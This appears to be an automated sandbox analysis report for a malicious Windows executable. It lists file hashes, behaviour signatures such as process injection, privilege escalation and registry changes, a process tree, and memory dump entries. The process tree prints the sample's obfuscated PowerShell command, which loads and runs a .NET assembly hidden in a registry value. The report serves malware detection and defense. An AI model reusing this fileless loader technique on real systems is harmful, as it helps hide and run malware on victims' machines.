1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1

Analysis

max time kernel
120s
max time network
18s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
06/06/2024, 02:19

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe
Size

219KB
MD5

9e3e62e59a79ed00da2a3f311f899689
SHA1

8f624d3d40bacf98f5310eac8402c7a54f62518a
SHA256

1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1
SHA512

52ea87f574a5b399d8accf0bfab53050f97598f522cd686caeaea034471a8030a089d9c39dedda726451846fe09e70477c8e272a4cdcc674788bef74ab1b0410
SSDEEP

3072:uzJNjggfyKg0KggLV0FOhJirBwtHwwEJx5Ehl/Qs7GzrlKFHZWazC3ayZyn+q/wC:yH10CtAbv

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3224 created 436	3224	powershell.EXE	5

Executes dropped EXE 1 IoCs

pid	Process
3104	$7769a91c

Loads dropped DLL 1 IoCs

pid	Process
2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2164 set thread context of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 3224 set thread context of 3308	3224	powershell.EXE	32

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 30959efab7b7da01	powershell.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3224	powershell.EXE
3224	powershell.EXE
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe
3308	dllhost.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe
Token: SeDebugPrivilege	3224	powershell.EXE
Token: SeDebugPrivilege	3224	powershell.EXE
Token: SeDebugPrivilege	3308	dllhost.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 2164 wrote to memory of 3104	2164	1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe	28
PID 3192 wrote to memory of 3224	3192	taskeng.exe	30
PID 3192 wrote to memory of 3224	3192	taskeng.exe	30
PID 3192 wrote to memory of 3224	3192	taskeng.exe	30
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3224 wrote to memory of 3308	3224	powershell.EXE	32
PID 3308 wrote to memory of 436	3308	dllhost.exe	5
PID 3308 wrote to memory of 480	3308	dllhost.exe	6
PID 3308 wrote to memory of 492	3308	dllhost.exe	7
PID 3308 wrote to memory of 500	3308	dllhost.exe	8
PID 3308 wrote to memory of 600	3308	dllhost.exe	9
PID 3308 wrote to memory of 680	3308	dllhost.exe	10
PID 3308 wrote to memory of 760	3308	dllhost.exe	11
PID 3308 wrote to memory of 824	3308	dllhost.exe	12
PID 3308 wrote to memory of 856	3308	dllhost.exe	13
PID 3308 wrote to memory of 972	3308	dllhost.exe	15
PID 3308 wrote to memory of 288	3308	dllhost.exe	16
PID 3308 wrote to memory of 1056	3308	dllhost.exe	17
PID 3308 wrote to memory of 1068	3308	dllhost.exe	18
PID 3308 wrote to memory of 1136	3308	dllhost.exe	19
PID 3308 wrote to memory of 1156	3308	dllhost.exe	20
PID 3308 wrote to memory of 1192	3308	dllhost.exe	21
PID 3308 wrote to memory of 2060	3308	dllhost.exe	24
PID 3308 wrote to memory of 2248	3308	dllhost.exe	25
PID 3308 wrote to memory of 2164	3308	dllhost.exe	27
PID 3308 wrote to memory of 3192	3308	dllhost.exe	29
PID 3308 wrote to memory of 3224	3308	dllhost.exe	30
PID 3308 wrote to memory of 3232	3308	dllhost.exe	31

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:436
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{5bb792e2-7d52-4787-8204-75d5addfb7c6}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3308

C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
1⤵
PID:480
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k DcomLaunch
  2⤵
  PID:600
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k RPCSS
  2⤵
  PID:680
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
  2⤵
  PID:760
- C:\Windows\System32\svchost.exe
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
  2⤵
  PID:824
- - C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    3⤵
    PID:1156
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k netsvcs
  2⤵
  PID:856
- - C:\Windows\system32\taskeng.exe
    taskeng.exe {834666FA-69DF-4EEC-BC4C-D2EF5FF7C1B0} S-1-5-18:NT AUTHORITY\System:Service:
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+''+[Char](55)+'7'+[Char](115)+''+'t'+''+'a'+'g'+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in System32 directory
      Suspicious use of SetThreadContext
      Modifies data under HKEY_USERS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3224
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalService
  2⤵
  PID:972
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k NetworkService
  2⤵
  PID:288
- C:\Windows\System32\spoolsv.exe
  C:\Windows\System32\spoolsv.exe
  2⤵
  PID:1056
- C:\Windows\system32\taskhost.exe
  "taskhost.exe"
  2⤵
  PID:1068
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
  2⤵
  PID:1136
- C:\Windows\system32\svchost.exe
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
  2⤵
  PID:2060
- C:\Windows\system32\sppsvc.exe
  C:\Windows\system32\sppsvc.exe
  2⤵
  PID:2248

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:492

C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
1⤵
PID:500

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1192
- C:\Users\Admin\AppData\Local\Temp\1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe
  "C:\Users\Admin\AppData\Local\Temp\1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2164
- - C:\Users\Admin\AppData\Local\Temp\$7769a91c
    "C:\Users\Admin\AppData\Local\Temp\$7769a91c"
    3⤵
    - Executes dropped EXE
    PID:3104

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-19723580424035252411843898452-1706057456-12958939051263618202-7185478061870140415"
1⤵
PID:3232

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\$7769a91c

Filesize
219KB

MD5
9e3e62e59a79ed00da2a3f311f899689

SHA1
8f624d3d40bacf98f5310eac8402c7a54f62518a

SHA256
1e04777d5df8153710660615cc90aad2ad0eff8705f13dca926a3b31d34c70f1

SHA512
52ea87f574a5b399d8accf0bfab53050f97598f522cd686caeaea034471a8030a089d9c39dedda726451846fe09e70477c8e272a4cdcc674788bef74ab1b0410

Download Submit
memory/2164-59-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-5076-0x0000000005A60000-0x0000000005AB4000-memory.dmp

Filesize
336KB

Download
memory/2164-2-0x0000000074DE0000-0x00000000754CE000-memory.dmp

Filesize
6.9MB

Download
memory/2164-3-0x0000000007670000-0x00000000078C6000-memory.dmp

Filesize
2.3MB

Download
memory/2164-4-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-13-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-19-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-5-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-21-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-17-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-15-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-11-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-9-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-7-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-27-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-33-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-43-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-51-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-57-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-67-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-65-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-63-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-61-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-0-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

Filesize
4KB

Download
memory/2164-1-0x0000000000960000-0x000000000099C000-memory.dmp

Filesize
240KB

Download
memory/2164-55-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-49-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-47-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-45-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-41-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-39-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-37-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-35-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-31-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-29-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-25-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-23-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-4891-0x0000000004D70000-0x0000000004DBC000-memory.dmp

Filesize
304KB

Download
memory/2164-4890-0x0000000005590000-0x0000000005622000-memory.dmp

Filesize
584KB

Download
memory/2164-4892-0x0000000074DE0000-0x00000000754CE000-memory.dmp

Filesize
6.9MB

Download
memory/2164-4913-0x0000000074DEE000-0x0000000074DEF000-memory.dmp

Filesize
4KB

Download
memory/2164-5067-0x0000000074DE0000-0x00000000754CE000-memory.dmp

Filesize
6.9MB

Download
memory/2164-53-0x0000000007670000-0x00000000078C0000-memory.dmp

Filesize
2.3MB

Download
memory/2164-5085-0x0000000074DE0000-0x00000000754CE000-memory.dmp

Filesize
6.9MB

Download
memory/3104-4912-0x0000000000400000-0x000000000042B000-memory.dmp

Filesize
172KB

Download
memory/3224-4914-0x0000000000960000-0x00000000009E0000-memory.dmp

Filesize
512KB

Download
memory/3224-4916-0x0000000000A00000-0x0000000000A08000-memory.dmp

Filesize
32KB

Download
memory/3224-4915-0x000000001A110000-0x000000001A3F2000-memory.dmp

Filesize
2.9MB

Download
memory/3224-4917-0x00000000013F0000-0x000000000141A000-memory.dmp

Filesize
168KB

Download
memory/3224-5086-0x0000000000960000-0x00000000009E0000-memory.dmp

Filesize
512KB

Download